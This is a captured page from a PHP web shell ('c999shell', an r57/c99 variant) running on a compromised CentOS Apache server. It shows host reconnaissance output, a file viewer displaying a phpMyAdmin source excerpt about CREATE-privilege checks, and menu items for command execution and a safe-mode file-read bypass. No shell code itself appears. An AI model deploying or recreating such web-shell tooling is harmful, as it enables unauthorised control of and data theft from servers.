Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/phpMyAdmin/libraries/ drwxr-xr-x | |
| Viewing file: Select action/file-type: = 4.1.0, we should be able to detect if user has a CREATE
// privilege by looking at SHOW GRANTS output;
// for < 4.1.0, it could be more difficult because the logic tries to
// detect the current host and it might be expressed in many ways; also
// on a shared server, the user might be unable to define a controluser
// that has the proper rights to the "mysql" db;
// so we give up and assume that user has the right to create a table
//
// Note: in this case we could even skip the following "foreach" logic
// Addendum, 2006-01-19: ok, I give up. We got some reports about servers
// where the hostname field in mysql.user is not the same as the one
// in mysql.db for a user. In this case, SHOW GRANTS does not return
// the db-specific privileges. And probably, those users are on a shared
// server, so can't set up a control user with rights to the "mysql" db.
// We cannot reliably detect the db-specific privileges, so no more
// warnings about the lack of privileges for CREATE TABLE. Tested
// on MySQL 5.0.18.
$is_create_table_priv = true;
/*
if (PMA_MYSQL_INT_VERSION >= 40100) {
$is_create_table_priv = false;
} else {
$is_create_table_priv = true;
}
foreach ( $dbs_where_create_table_allowed as $allowed_db ) {
// if we find the exact db name, we stop here
if ($allowed_db == $db) {
$is_create_table_priv = TRUE;
break;
}
// '*' indicates a global CREATE priv
if ($allowed_db == '*') {
$is_create_table_priv = TRUE;
break;
}
if (ereg('% |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0054 ]-- |